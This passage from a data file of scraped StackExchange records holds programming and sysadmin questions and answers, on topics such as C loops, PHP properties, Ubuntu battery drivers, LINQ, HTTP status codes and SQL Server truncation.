intent of what's contained within what...\nAnswer: The syntax for <code>for<\/code> is:\n<code>for (...) STMT\n<\/code>\nOnly the statement immediately following the parens is part of the loop. This statement could be a simple statement (an expression with a semi-colon), a block (statements in curlies), some flow control statement (like another <code>for<\/code> loop), etc.\nThe important part is that only the first statement after the <code>for<\/code> is part of the loop.\n<code> for (int i = 1; i < 12; i++)\n for (int k = i; k < 12; k++)\n if (arrNew[i] != arrNew[k]) {\n printf(\"\\nPin %d is not the same as %d.\", arrNew[i], arrNew[k]);\n }\n \n if (arrNew[k]=1) { \/\/ <---- Not part of either loop\n count1++;\n }\n<\/code>\nIf you want more than one statement to form the body a loop, you'll need to wrap them in curlies (like you did for the <code>if<\/code> statements).\nNot sure what you were going for, so I'm not sure how to fix it.\n\nNote that you appear to have confused <code>=<\/code> for <code>==<\/code> in the bottom <code>if<\/code>.\nComment: It's the same syntax; a compound statement `{...}` is just one kind of statement that can be used as the body of the `for` loop.\n","meta":{"source":"stackoverflow","title":"Can I combine two for statements into one?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bug on PDF@StableDistribution when beta is less than -0.995?\n\nQuestion: I see a problem with <code>PDF@StableDistribution<\/code> when beta is less than <code>-0.995<\/code>, Mathematica 10.0 and 11.0 64 bit for Windows, try for example:\n<code>Plot[PDF[StableDistribution[0, 1.88, -0.995, 0., 0.1], x], {x, -6 , -4},PlotRange -> All] \n<\/code>\n\nYou'll see a discontinuity that should not exist, how to fix? Thanks.\nComment: Please do not use bug tag unless it is confirmed by community or WRI Support.\nAnswer: This is just an extended comment. As there is no closed-form formula for a stable distribution (except for certain special combinations of parameters) numerical methods are used to estimate the density. All such algorithms don't always work well in the tail regions.\nTo put your issue in perspective consider extending the plot range to <code>{-6,1}<\/code>:\n<code>Show[\n Plot[PDF[StableDistribution[0, 1.88, -0.995, 0., 0.1], x], {x, -6, 1},\n PlotRange -> All],\n ListPlot[{{-6, 0}, {-4, 0}}, PlotStyle -> Thickness[0.02], \n Joined -> True, PlotRangeClipping -> False]\n]\n<\/code>\n\nThe highlighted portion in the lower left of the figure is the range for your original figure. If you really need great accuracy in the tail regions, you should report this issue directly to Wolfram, Inc.\nAnswer: Another way to look at it is that it has to do with round-off (and possibly underflow, I suppose). This can be addressed by increasing the working precision (and the precision of the parameters):\n<code>Plot[PDF[StableDistribution[0, 1.88`32, -0.995`32, 0, 0.1`32], \n x], {x, -6, -4}, PlotRange -> All, WorkingPrecision -> 32]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Bug on PDF@StableDistribution when beta is less than -0.995?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Am I traceable if the VPN I am using keeps turning on and off?\n\nQuestion: Let's say Bob is on network A and he decided to use a VPN service. Unfortunately he is using a poor VPN service which keeps turning on and off. But the Active downloads of packets are still ongoing because of the active home network A. \nFor example, a streaming youtube video is not effected by this switching of networks. So is there anywhere this trail is logged? If it's logged, who can trace it? Who has rights to trace it? \nComment: Keep in mind that VPN is not designed to ensure anonymity.\nComment: I found this somehow related to it but does not answer my question : https:\/\/security.stackexchange.com\/questions\/72679\/differences-between-using-tor-browser-and-vpn?rq=1\nComment: sure, when I just went through above Q, I come to realize that the whole idea of anonymity through VPN is not complete. I understood that it provide access to different network and IPs.\nAnswer: You are traceable. You used the correct idea when you described it as \"switching networks\". As you are streaming, your computer continually reaches out to the server to get the next bits. Your computer does not care what network it is on, it is just reaching out to the server, and the network and all the hops between you and the server are responsible for getting the traffic there.\nSo, if you start off using a VPN, then the packets travel over the VPN network. If that network goes down, then the network adjusts to keep the stream going on the new non-VPN network. This stream is unprotected in any way.\nAll streams are logged. The VPN provider logs the streams going through it, and the ISP logs the streams going through it. The server also logs the connections made, so it will see that the stream keeps switching networks.\nComment: and so this kind of sessions which are divided over multiple network is more exposing about digital footprint than the sessions which are performed only in single network? Or one (admin of ISP or VPN) can deduct the same footprint in both cases?\nComment: what do you mean by \"footprint\"?\nComment: I mean when the session started , which IP , new IPs of VPN, accessed URL throughout the session and things like this which ISP servers keep sniffing.\n","meta":{"source":"security.stackexchange","title":"Am I traceable if the VPN I am using keeps turning on and off?","dup_signals":{}},"subset":"stackexchange"} +{"text":"variable accesible in php class built in the construtor that references another class?\n\nQuestion: So, in short I'd like my login class to not have to create a new instance of my DB class within in function. Currently I'm trying to do it like this:\n<code><?php\n\nclass siteLogin\n{\n\nprivate $db;\nprivate $dataStore;\n\nfunction __construct()\n{\n if (!isset($_SESSION)) {\n session_start();\n }\n\n require_once '..\/application\/db.php';\n $this->$db = new DB();\n require_once '..\/application\/data.php';\n $this->$dataStore = new Data($db);\n}\n<\/code>\nBut I get the error:\n<code> Fatal error: Cannot access empty property in C:\\var\\www\\sexdiaries.co.uk\\class\\siteLoginClass.php on line 16\n<\/code>\nI would like to give give <code>$this->$db<\/code> the reference to <code>siteLogin<\/code> class.\nAnswer: You're not using the right notation for properties. Try this instead:\n<code>$this->db = new DB();\n$this->dataStore = new Data($db);\n<\/code>\nThey aren't prefixed with <code>$<\/code> like normal variables. This is because you can use variable property names in PHP, e.g.\n<code>$foo = 'db';\necho $this->$foo; \/\/ equivalent to `echo $this->db;`\n<\/code>\nIn your case, <code>$db<\/code> was an undefined variable that got initialised to an empty string (although a PHP notice would have been triggered - do you have error reporting on?), so you were effectively trying to access a property of the same name, hence the error <code>Cannot access empty property<\/code>.\n","meta":{"source":"stackoverflow","title":"variable accesible in php class built in the construtor that references another class?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Battery Power Icon won't display on top bar\n\nQuestion: I have a surface book 2, and recently updated my OS from windows to ubuntu 20.04.1 LTS.\nI'm running into a problem when trying to update the top bar of the UI to show the battery percentage status.\nI've ran this command to enable the battery icon, but no luck\n<code>gsettings set org.gnome.desktop.interface show-battery-percentage true\n<\/code>\nI've also downloaded the \"Tweaks\" application, and toggled the battery percentage switch to ON. However, nothing.\nI've rebooted my system, but nothing as well.\nChecking the power stats shows that the battery is not been recognized.\n\nThank you in advance for debugging this.\nBest,\nAlvaro\nAnswer: Welcome to AskUbuntu, Alvaro.\nTo get this working on your SurfaceBook 2, you'll need to install some ACPI drivers so that the battery (and other devices) can be accessed. Here's how to do it:\n\nOpen a terminal (<code>[Ctrl]<\/code>+<code>[Alt]<\/code>+<code>[T]<\/code>)\nInstall the necessary tools to work with the source code you're going to need:<code>sudo apt install build-essential dkms git<\/code>\nMove to a \"safe\" working directory, for example:<code>cd ~\/Downloads<\/code>\nClone the ACPI drivers from GitHub to your machine:<code>git clone https:\/\/github.com\/qzed\/linux-surfacegen5-acpi<\/code>\nGo to the <code>module<\/code> directory:<code>cd linux-surfacegen5-acpi\/module\/<\/code>\nCompile the module:<code>make<\/code>\nInstall the module:<code>sudo insmod surfacegen5_acpi.ko<\/code><code>sudo make dkms-install<\/code>\n\nThe battery indicator should appear 5~10 seconds after installing the module.\n","meta":{"source":"askubuntu","title":"Battery Power Icon won't display on top bar","dup_signals":{}},"subset":"stackexchange"} +{"text":"php function imap_open failing when run through command line on windows with script\n\nQuestion: I am running Windows Server 2012, and is also running apache and PHP on an intranet.\nWhen I pull the script through http:\/\/localhost\/script.php it runs without issue and no problems.\nWhen I run the same script through the command line with the prompt:\nC:\\wamp\\bin\\php\\php5.3.3\\php.exe C:\\wamp\\www\\script.php\nit dies at the line when it gets to imap_open.\nHere is the full code:\n<code>$hostname = '{email-host:995\/pop3\/ssl\/novalidate-cert}INBOX';\n$username = 'user';\n$password = 'password';\n\n$inbox = imap_open($hostname,$username,$password) or die('Cannot connect: ' . imap_last_error());\n<\/code>\nAny ideas on why it will not work through command prompt.\nin php.ini, I have included:\n<code>extension=php_imap.dll\n\nextension=php_openssl.dll\n<\/code>\nComment: the php.ini for the command line is different then the one for apache, usually its cli.ini, so likely you don't have the extension enabled in that one... What error do you get when it `dies`, that would be helpful.\nComment: Thanks for the advice. There are two php.ini files, in for wamp, you have to go to the folder: C:\\wamp\\bin\\php\\php5.3.3 and edit the php.ini in that folder and that controls the settings for the command prompt.\nAnswer: Enable the extension in the <code>cli.ini<\/code> or <code>php-cli.ini<\/code> file. Which is a separate config then the one Apache uses.\nThat's my guess at least... Without knowing what error you get when it dies.\n","meta":{"source":"stackoverflow","title":"php function imap_open failing when run through command line on windows with script","dup_signals":{}},"subset":"stackexchange"} +{"text":"Complex integral with branch cuts\n\nQuestion: I am struggling with a complex double integral with multiple branch cuts. Even the single variable complex integral I find quite complicated due to the branch cut and the special functions involved in. Here is the simplified version of what I am after.\n<code>F[z_] := D[- Log[EllipticTheta[1, Pi z, E^(- Pi * t)]], {z, 2}]\nIntegrate[F[z]^{-u}, {z, 0, 1}] \n<\/code>\nWhere $t,u \\in \\mathbb R$ and $t,u > 0$.\nIt will be great to have an analytic answer (even for particular values of $u$, say integers to avoid some cuts). But I would be even happy with a numerical integration. I think the main obstruction that I am facing here is how to deal with the cuts in Mathematica.\nComment: F depends on z and t. Therefore, the Integral depends on t. Therefore, you can not do a numerical integration. And it is quit possible that no analytical solution exists.\nComment: I think you should first confirm `EllipticTheta` is not negative or zero in the range you're integrating. It doesn't look like it is. If so then you're not breaching any branch points or branch cuts of `Log` when $u$ is an integer. When it's rational, then in general would need to deal with branch point and cuts of root objects but again since not integrating over the orgin would not encounter the Mathematica default branch cut along the negative real axis for root objects as well.\nAnswer: Don't see any problem with its numerical integration. For example,\n<code>t = Pi; F[z_] := D[-Log[EllipticTheta[1, Pi z, E^(-Pi*t)]], {z, 2}]\nTable[NIntegrate[F[z]^-u, {z, 0, 1}], {u, 1, 4,1\/2}]\n<\/code>\n\n<code>{0.0506606, 0.013688, 0.00384974, 0.00110951, 0.00032505, 0.0000963569, 0.0000288177}<\/code>\nComment: `t = Pi; u = E; \nF[z_] := D[-Log[EllipticTheta[1, Pi z, E^(-Pi*t)]], {z, 2}]\nNIntegrate[F[z]^-u, {z, 0, 1}]` results in `0.00064808`.\nAnswer: The elliptic Thetas near the real line are deformations of $sin, cos$ functions with periods of multiples of $\\pi$ and exponential growth in imaginary directions\n<code> Manipulate[ComplexPlot3D[EllipticTheta[1, z, q], \n{z, -Pi (1 + I\/5), Pi (1 + I\/5)}, PlotRange -> All,\nTicks -> {Pi Range[-1, 1], Automatic, Automatic}], \n{{q, 0.8}, 0.01,1}, ControlPlacement -> Top]\n<\/code>\n\nThe logarithm has of course logarithmic branch cuts along the real line of negative half periods with infintely many copies of $\\mathbb C$ with $2\\pi i $ distance in the argument. Integrals along the real line make sense only in the intervals of positivity of $sin z$\n\nStructurally, the derivative of $ (Log Sin)'' = Csc^2$ is showing the second derivatives have the form of quadratic rationals of elliptic Thetas, that can be further analyzed via their Fourier series.\nComment: Doesn't `Manipulate[\n ComplexPlot[\n EllipticTheta[1, z, q]^(-1\/2), {z, -Pi (1 + I\/5), Pi (1 + I\/5)}, \n PlotRange -> All, \n Ticks -> {Pi Range[-1, 1], Automatic, Automatic}], {{q, 0.8}, 0.01, \n 1}, ControlPlacement -> Top]` show branch cuts or am I mistaken?\nComment: The theta functions are eintier functions in z. This fact is clear for fast converging Fourier series with coefficients converging to zero faster than any power, which is just a bit slower than a finite fourier sum. They are periodic in the real direction and quasiperiodic in imaginary direction. Their quotients are the meromorphic Jacobi elliptic functions.\n","meta":{"source":"mathematica.stackexchange","title":"Complex integral with branch cuts","dup_signals":{}},"subset":"stackexchange"} +{"text":"IIS7 and clientCaching with ASP.Net MVC\n\nQuestion: Is it possible to declaratively set <code>clientCache<\/code> for an Action using the web.config in IIS7?\nWe need to set an expiry value of 1 day for our <code>Home\/Index<\/code> action. As of now we are doing this using a filter attribute. Is it possible to accomplish the same declaratively?\nWe are able to do it for static content, but not for action methods through the <code>location<\/code> and <code>system.webServer<\/code> sections in the web.config.\n<code><location path=\"Content\">\n <system.web>\n <authorization>\n <allow users=\"*\"\/>\n <\/authorization>\n <\/system.web>\n <system.webServer>\n <staticContent>\n <clientCache httpExpires=\"Sat, 28 Nov 2009 09:00:00 GMT\" cacheControlMode=\"UseExpires\" \/>\n <\/staticContent>\n <\/system.webServer>\n<\/location>\n<\/code>\nAnswer: I don't think it would be possible to do so in web.config - we create a base controller and put it in there. That way we don't have to decorate all of our actions with attributes.\n","meta":{"source":"stackoverflow","title":"IIS7 and clientCaching with ASP.Net MVC","dup_signals":{}},"subset":"stackexchange"} +{"text":"what is main\/major difference between interface and abstract class in oop\n\nQuestion: I face this question in many interviews but here i exactly want to know the big difference between interface and abstract class in object oriented programming.\nAnyone there?\nComment: Possible duplicate of [Interface vs Abstract Class (general OO)](https:\/\/stackoverflow.com\/questions\/761194\/interface-vs-abstract-class-general-oo)\nAnswer: Interface:\n1.Interface is not class\n2.Interface use for \u2013 Data Abstraction, Future implementation.\n3. Interface contains only the abstract members.\n4.Interface contains the declaration, the class which will implement it will have to define\/add the logic on it.\nAbstract Class\n1.Abstract class is a class\n2.Abstract class is use for a base class.\n3. Abstract class contains both Abstract + normal members\n4.The abstract members have only the declaration (like Interface),but the normal members are getting define.\nAnswer: One major difference of interface and abstract class is:\nif interface contains 9 methods and we implements that interface then we need to override all 9 methods in our class.\nif we take one abstract class and we extends that abstract class no need to override all 9 methods override only that method that wee need.\nAnswer: The main difference is that in interface we can only define the methods and variable and give body\/values where it is implemented by overriding.\nWhere abstract class has the property of a normal class and an interface. We can just make the variables and methods abstract like interface and we can also add variables and methods with body\/value in the same class.\n","meta":{"source":"stackoverflow","title":"what is main\/major difference between interface and abstract class in oop","dup_signals":{}},"subset":"stackexchange"} +{"text":"Remove objects, and child objects from a list in C# where they match an object property in another list\n\nQuestion: I need a C# LINQ query where I remove objects in a list based on whether they match a property in another list. In addition, those objects can contain children of the same type and I need to remove them as well if there is not a match.\nIn my example, I also want to remove the children of children. The match doesn't need to be hierarchical - just a basic match. Here are my classes and my failed attempt. Any help would be awesome!\n<code>public class GsdMegaMenu\n {\n public int Id { get; set; } \n public int PortalId { get; set; } \n public int TabId { get; set; } \n }\n\npublic class MenuItem\n {\n public int Id { get; set; } \n public int PortalId { get; set; } \n public int TabId { get; set; }\n public List<MenuItem> Children { get; set; }\n\n }\n\nList<GsdMegaMenu> megaMenuItems = GsdMegaMenu.GetAllGsdMegaMenus();\nRootNode.Children.RemoveAll(x => !megaMenuItems.Any(y => y.TabId == x.TabId));\n<\/code>\nComment: Thanks - you are correct, I updated the codebase. Any idea on the error I get when implementing @Cyral code snippet?\nComment: Your code looks like you are only removing immediate children. Not children of children. Is that right?\nComment: @zespri - yes, I am trying to remove the children, and the children of children, that do not match the TabId property of the comparable List. The code below looks like it should work but I get an error about converting the list to a system predicate. I don't know what that means...\nComment: So, what's wrong with the code in your question (not in that answer)? Are you gettting a error?\nComment: My code works, it just doesn't take in to account the children of the children - just the direct children.\nAnswer: If you need to also process children of children you would have to explicitly loop though them. RemoveAll is not a linq method it's a method on the <code>List<\/code> class. You will need to call it on every children list.\n<code>RootNode.Children.RemoveAll(x => megaMenuItems.All(y => y.TabId != x.TabId));\nforeach (MenuItem node in RootNode.Children)\n{\n if (node.Children != null)\n {\n node.Children.RemoveAll(x => megaMenuItems.All(y => y.TabId != x.TabId));\n }\n }\n<\/code>\nUpdate\nIf you are after purely LINQ solution it has to be read-only, that is it can't manipulate existing lists, it can create new ones. I would not recommend it in your case though. In your case the loop above seems more fitting.\n<code>RootNode = RootNode.Children.Where(x => megaMenuItems.Select(y => y.TabId).Contains(x.TabId))\n .Select(z => new MenuItem\n {\n Id = z.Id, PortalId = z.PortalId, TabId = z.TabId, \n Children = z.Children == null ? null \n : z.Children.Where(x => megaMenuItems.Select(y => y.TabId).Contains(x.TabId)).ToList() \n })\n .ToList();\n<\/code>\nFor efficiency (not that it would matter in your case), you could also rewrite it as this:\n<code>Func<MenuItem, bool> predicate = x => megaMenuItems.Select(y => y.TabId).Contains(x.TabId);\nRootNode = RootNode.Children.Where(predicate)\n .Select(z => new MenuItem\n {\n Id = z.Id, PortalId = z.PortalId, TabId = z.TabId, \n Children = z.Children == null ? null\n : z.Children.Where(predicate).ToList()\n })\n .ToList();\n<\/code>\nComment: Nest another loop in then =)\nComment: This is fantastic - perfect! One more thing... What if I wanted to take it one more level down to remove the nodes if the children of the children had a match. Again - thank you!\n","meta":{"source":"stackoverflow","title":"Remove objects, and child objects from a list in C# where they match an object property in another list","dup_signals":{}},"subset":"stackexchange"} +{"text":"Jasmine 4 ANgular 13 CryptoBrowserify publicEncrypt Error spyOn> : publicEncrypt is not declared writable or has no setter\n\nQuestion: publicEncrypt is not declared writable or has no setter\n<code> beforeEach(fakeAsync(() => {\n spyOn(CryptoBrowserify, 'publicEncrypt').and.returnValue(Buffer.from('ENCRYPT', 'utf8'));\n \n }));\n\nError: <spyOn> : publicEncrypt is not declared writable or has no setter\n Usage: spyOn(<object>, <methodName>)\n Error: <spyOn> : publicEncrypt is not declared writable or has no setter\n Usage: spyOn(<object>, <methodName>)\n<\/code>\nComment: It seems like you want to `spyOn` an imported library function. It is not possible to do that anymore with the changes\/updates to TypeScript. I have found this to be the best method in spying on imported libraries: https:\/\/stackoverflow.com\/questions\/60259259\/error-supportsscrollbehavior-is-not-declared-configurable\/62935131#62935131. Read the Github thread as well.\nComment: Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.\nComment: @AliF50 Thank you, working fine with Wrapper class, did you get a chance to write test case for wrapper class? we need to cover 100%,\nexport class CryptoBrowserifyWrapper {\n public static publicEncrypt(...args) {\n return publicEncryptLocal(...args);\n }\n}\nComment: I am not sure how to test the wrapper class, I personally did not test it. Show your boss this tweet: https:\/\/twitter.com\/BenLesh\/status\/912487170371284994 ;).\nAnswer: So this is telling you that the property is not <code>writable<\/code>.\nYou can work around this by overriding the property descriptor for the duration of your test\nNote that you can only do this if the property is <code>configurable<\/code>.\nI have found that in Angular if you do the below prop descriptors come as non-configurable so you will not be able to apply the solution\n<code>\/\/ this will cause prop descriptors to come as non-configurable\nimport from 'zone.js'\n<\/code>\nSo in your <code>test.ts<\/code> do this instead\n<code>\/\/ this will cause prop descriptors to come as configurable\nimport from 'zone.js\/dist\/zone'\nimport from 'zone.js\/dist\/zone-testing'\n<\/code>\n<code>import * as someNsObj from 'external\/lib';\n\n\/\/ get the current descriptor\nconst originalDesc = Object.getOwnPropertyDescriptor(someNsObj, 'targetFunction');\n\n\/\/ replace with a writable prop\nbeforeAll(() => {\n Object.defineProperty(someNsObj, 'targetFunction', {\n enumerable: true,\n configurable: true,\n writable: true, \/\/ this is what makes the difference\n value: () => {}, \/\/ or whatever makes sense\n });\n});\n\n\/\/ restore the original descriptor\nafterAll(() => {\n Object.defineProperty(someNsObj, 'targetFunction', originalDesc);\n});\n<\/code>\n","meta":{"source":"stackoverflow","title":"Jasmine 4 ANgular 13 CryptoBrowserify publicEncrypt Error spyOn> : publicEncrypt is not declared writable or has no setter","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it OK return http status 404 in the POST?\n\nQuestion: I'm developing an API and I always try to use the most correct http status codes for each scenario.\nOne of this scenarios is the response for POST requests. Per example, a POST method for an endpoint <code>\/orders\/<\/code> receive some informations, like a <code>customer<\/code>:\n<code>{\n customerDocument: {number: \"123.456.789\"},\n \/\/ other informations for create a order\n}\n<\/code>\nSo, my questions is: if this <code>number<\/code> from <code>customerDocument<\/code> not exists, is it Ok to return a 404 status code error with a nice message telling that the customer was not found?\nI normally use 404 only for GET in the specific resources (the most obvious usage), like:\n<code>\/customers\/{number}\/\n<\/code>\nIn business validations like \"The customer is not active\", I normally use the http status code 422 for any http method (POST, PUT, GET, etc). I'm in doubt if I can use 404 or 422 for my POST example.\nComment: I tend to follow this table http:\/\/www.restapitutorial.com\/lessons\/httpmethods.html\nAnswer: I think <code>400<\/code> is the appropriate status code in this scenario, given its definition from Wikipedia:\n\n400 Bad Request\nThe server cannot or will not process the request due to an apparent client error.\n\nAccording to the description, semantically, <code>422<\/code> is better (\"The request was well-formed but was unable to be followed due to semantic errors.\"). However, <code>422<\/code> is introduced for WebDAV, so it is better to use general purpose status code such as <code>400<\/code>.\n<code>400<\/code> is not the perfect status code, as whether document number exists or valid is not so apparent. However, excludes special-purpose status code such as <code>422<\/code>, <code>400<\/code> is the best option.\nWhy <code>404<\/code> is not appropriate?\nFrom RESTful API point of view, endpoint <code>\/orders\/<\/code> is a resource, no matter it accepts <code>GET<\/code> or <code>POST<\/code> or something else. <code>404<\/code> is only appropriate when the resource <code>\/orders\/<\/code> itself does not exist. If <code>\/orders\/<\/code> endpoint exist, but its invocation failed (no matter what reasons), the response status code must be something other than <code>404<\/code>.\nComment: Hi, your comment on 404 in inaccurate. if the endpoint \/orders does not exist that is 404, that part is right, but if the order 123 does not exist and user calls \/orders\/123, that is also a 404. @Dherik should be returning 404 as the response for the scenario he is asking about\nComment: 412 Precondition Failed is not appropriate unless the client has defined the precondition in the headers. You should remove that part of your answer.\nComment: @VoiceOfUnreason Thanks for your suggestion, introducing `412` do make things complicated and confusing. I'll remove it from my answer.\nComment: @shaochuancs about the 404, I agree! But the 400 not appear the best option. Normally, the people understand 400 as a syntax or type error in the request. As described in the Wikipedia link: \"e.g., malformed request syntax, size too large, invalid request message framing, or deceptive request routing\". In RestEasy framework, 400 is used for this cases, for example.\nComment: @Dherik yes, 400 is not perfect. But after check all response code, I can't find a code better than it.\n","meta":{"source":"stackoverflow","title":"Is it OK return http status 404 in the POST?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Do I need to include my scaled outputs in my back-propagation equation (SGD)?\n\nQuestion: Quick question, when I am backpropagating the loss function to my parameters and I used a scaled output (ex. tanh(x) * 2), do I need to include the derivative of the scaled output w.r.t the original output? Thank you!\nComment: Is loss calculated before or after scaling?\nAnswer: Before we can backprop the errors, we've to compute the gradient of the loss function with respect to each of the parameters. This computation involves computing the gradients of the outputs first and then use chain rule repeatedly. So, when you do this, the scaling constant remains as is. So, yes, you've to scale the errors accordingly.\nAs an example, you might have observed the following L2 regularized loss - a.k.a Ridge regression:\nLoss = 1\/2 * |T - Y|^2 + \\lambda * ||w||^2\nHere, we are scaling down the squared error. So, when we compute the gradient 1\/2 & 2 would cancel out. If we would not have multiplied this by 0.5 in the first place, then we would have to scale up our gradient by 2. Else the gradient vector would point in some other direction instead of the direction which minimizes the loss.\n","meta":{"source":"stackoverflow","title":"Do I need to include my scaled outputs in my back-propagation equation (SGD)?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rails partial not rendered when called via JavaScript function\n\nQuestion: I am trying to render a partial upon change in the drop down list.\nThere is the onchange javascript function which directs to a link to display the corresponding form.\nBut here I am getting a <code>#<ActionController::UnknownFormat: ActionController::UnknownFormat><\/code> error inside the get_template method in controller.\nI suppose it is something to do with calling the link through javascript, as the request is processed as HTML. \n<code>Processing by XYZController#get_template as HTML\n<\/code>\nHow to process it as JS ? \nHere's the detailed code. \ndropdown.html.erb \n<code><div id=\"requests_dropdown\">\nChoose the type of request : <%= select_tag 'drop_request_id', options_for_select(@request_types.map{|x| [x[:name], x[:id]] } ) %>\n<\/div>\n<\/code>\nJavascript\n<code><script>\n\n$('#drop_request_id').on('change', function() { \n var request_type_id = $('#drop_request_id').val();\n var href = 'get_template\/' + request_type_id ;\n window.location = href;\n});\n<\/script>\n<\/code>\ncontroller\n<code> def get_template\n\n @request_type = [x,y,z] \n respond_to do |format|\n format.js\n end\nend\n<\/code>\nget_template.js.erb\n<code>$(\"#request_form_partial\").html(\"<%= escape_javascript(render partial: 'request_form', locals: { request_type: @request_type } ) %>\"); \n<\/code>\nComment: Out of curiosity, why are you using `window.location = href` instead of an AJAX `get` call?\nAnswer: You need to call your method via ajax.\nYou are getting error because you are trying to GET the html format,whereas your method renders the js format response.\nPlease edit your code to following:\n<code> <script> $('#drop_request_id').on('change', function() { \nvar request_type_id = $('#drop_request_id').val(); \nvar href = 'get_template.js\/' + request_type_id ; \n$.get(href);\n}); \n<\/script>\n<\/code>\n","meta":{"source":"stackoverflow","title":"Rails partial not rendered when called via JavaScript function","dup_signals":{}},"subset":"stackexchange"} +{"text":"I do not understand this error haskell\n\nQuestion: My code receives a list of values \u200b\u200bin hexadecimal and i have to pass them to binary and put each result in a list but I have these two errors and i dont know how to fix them\n<code>Pixels.hs:121:29:\n Occurs check: cannot construct the infinite type:\n t0 = Bool -> [a1] -> t0\n In the return type of a call of `modA'\n Probable cause: `modA' is applied to too many arguments\n In the expression:\n modA (o ++ [(k `mod` 2)]) (l + 1) (k `div` 2) otherwise o\n In an equation for `modA':\n modA o l k\n | l < 8 = modA (o ++ [(k `mod` 2)]) (l + 1) (k `div` 2) otherwise o\n\nPixels.hs:126:89:\n Couldn't match expected type `[a0]'\n with actual type `Bool -> t1 -> [[a1]] -> [a0] -> t0'\n In the first argument of `(++)', namely `f'\n In the fourth argument of `f', namely\n `(f\n ++\n [(psr (head (e1)))\n ++\n (psr (head (e2)))\n ++ (psr (head (e3))) ++ (psr (head (e4))) ++ (psr (head (e5)))])'\n In the expression:\n f otherwise\n convertir\n [tail (e1), tail (e2), tail (e3), tail (e4), ....]\n (f\n ++\n [(psr (head (e1)))\n ++\n (psr (head (e2)))\n ++ (psr (head (e3))) ++ (psr (head (e4))) ++ (psr (head (e5)))])\nFailed, modules loaded: none.\n<\/code>\nhere is the code\n<code>rInt :: String -> Int\nrInt = read\n\nfont:: Char -> Pixels\nfont a = let x= ord a in\n if x>=0 || x<=31 || x>=126 then [\"*****\",\"*****\",\"*****\",\"*****\",\"*****\",\"*****\",\"*****\"]\n else\n auxfont (fontBitmap!!(x-32))\n where\n auxfont b = let y = map trns (map rInt (map show b)) in\n convertir y []\n\n trns z = modA [] 1 z\n modA o l k\n | l < 8 = modA (o++[(k `mod` 2)]) (l+1) (k `div` 2) \n otherwise o \n\n convertir (e1:e2:e3:e4:e5) f \n | null e1 = f\n otherwise convertir [tail(e1),tail(e2),tail(e3),tail(e4),tail(e5)] (f++[(psr(head(e1)))++(psr(head(e2)))++(psr(head(e3)))++(psr(head(e4)))++(psr(head(e5)))])\n psr 0 = \" \"\n psr 1 = \"*\"\n<\/code>\nComment: Have you tried specifying the type signature of modA. This can often result in a more understandable error message.\nComment: Can you give the minimum compilable example, pixals and ord are missing\nAnswer: Your syntax is wrong, you need a <code>|<\/code> before <code>otherwise<\/code>:\n<code>foo x y z | x > y = ...\n | otherwise = ...\n<\/code>\n","meta":{"source":"stackoverflow","title":"I do not understand this error haskell","dup_signals":{}},"subset":"stackexchange"} +{"text":"Cannot truncate table because it is being referenced by a FOREIGN KEY constraint\n\nQuestion: I get the following message even when the table that references it is empty: \"Cannot truncate table 'dbo.Link' because it is being referenced by a FOREIGN KEY constraint\" Doesn't seem to make much sense why this is occurring. Any suggestions?\nAnswer: In SQL Server a table referenced by a FK cannot currently be truncated even if all referencing tables are empty or the foreign keys are disabled.\nYou need to use <code>DELETE<\/code> (may require much more logging) or drop the relationship(s) prior to using <code>TRUNCATE<\/code> and recreate them afterwards or see the workarounds on this connect item for a way of achieving this using <code>ALTER TABLE ... SWITCH<\/code>\nComment: thats sounds like quite a poor feature of the product. but i guess will need to factor that into code. thanks\nAnswer: You cannot truncate a table which has an FK constraint on it. As workaround, you could:\n1\/ Drop the constraints\n2\/ Trunc the table\n3\/ Recreate the constraints.\nHere it is the associated T-SQL script, supposing you have 2 tables called MyTable and MyReferencedTable:\n<code>-- Remove constraint\nIF EXISTS(SELECT 1 FROM sys.foreign_keys WHERE name = 'FK_MyReferencedTable_MyTable')\nBEGIN\n ALTER TABLE dbo.MyReferencedTable\n DROP CONSTRAINT FK_MyReferencedTable_MyTable\nEND\n\n-- Truncate table\nTRUNCATE TABLE dbo.MyTable\n\n-- Re-Add constraint\nIF NOT EXISTS(SELECT 1 FROM sys.foreign_keys WHERE name = 'FK_MyReferencedTable_MyTable')\nBEGIN\n ALTER TABLE dbo.MyReferencedTable\n WITH CHECK ADD CONSTRAINT [FK_MyReferencedTable_MyTable] FOREIGN KEY(ListingKey)\n REFERENCES dbo.MyTable (ListingKey)\nEND\n<\/code>\nAnswer: Execute the following query to search any constraint:\n<code>use MyDatabase\nselect c.name as c_name, t.name as t_name\nfrom sys.key_constraints c\njoin sys.tables t on t.object_id = c.parent_object_id\n<\/code>\nIf any constraint found on your table, remove it.\nAnswer: If you are receiving this error and you need to truncate the table then alternative solution could be that you can drop and re-create the table along with <code>primary\/other_keys\/indexes\/triggers<\/code>. Please make sure that you don't need to the data in that table.\nThis soulution is working like a charm for me and hardly took a minute to finish. I am doing it for masking purpose.\nAnswer: Not for SQL Server but MySQL only.\nInstead of deleting or recreating the constraint, I prefer this simpler way.\nDisable the constraint validation by executing the following query first :\n<code>SET FOREIGN_KEY_CHECKS=0;\n<\/code>\nThen truncate your tables\nAnd finally, reactivate the constraint validation :\n<code>SET FOREIGN_KEY_CHECKS=1;\n<\/code>\nThats a common solution when you migrate databases, so you don't have to worry about the order the tables are inserted in.\nComment: This is for MySQL and not SqlServer.\nComment: This is not a valid SQL Server setting.\n","meta":{"source":"stackoverflow","title":"Cannot truncate table because it is being referenced by a FOREIGN KEY constraint","dup_signals":{}},"subset":"stackexchange"} +{"text":"Issue with CFArrayRef and NSArray when drawing gradient using ARC\n\nQuestion: I have an ARC project and am trying to draw a vertical linear gradient. The code below works on the simulator, but throws a memory \/<code>EXC_BAD_ACCESS<\/code> error when testing on the device. The app crashes on with the following two lines of code:\n<code>NSArray *colorArray = [NSArray arrayWithObjects:(__bridge id)topColor, (__bridge id)bottomColor, nil];\nCGGradientRef gradient = CGGradientCreateWithColors(colorSpace, (__bridge CFArrayRef) colorArray, colorLocations); \n<\/code>\nThose two lines of code are taken from the following code (provided for reference):\n<code>- (void)drawRect:(CGRect)rect\n{\n CGContextRef context = 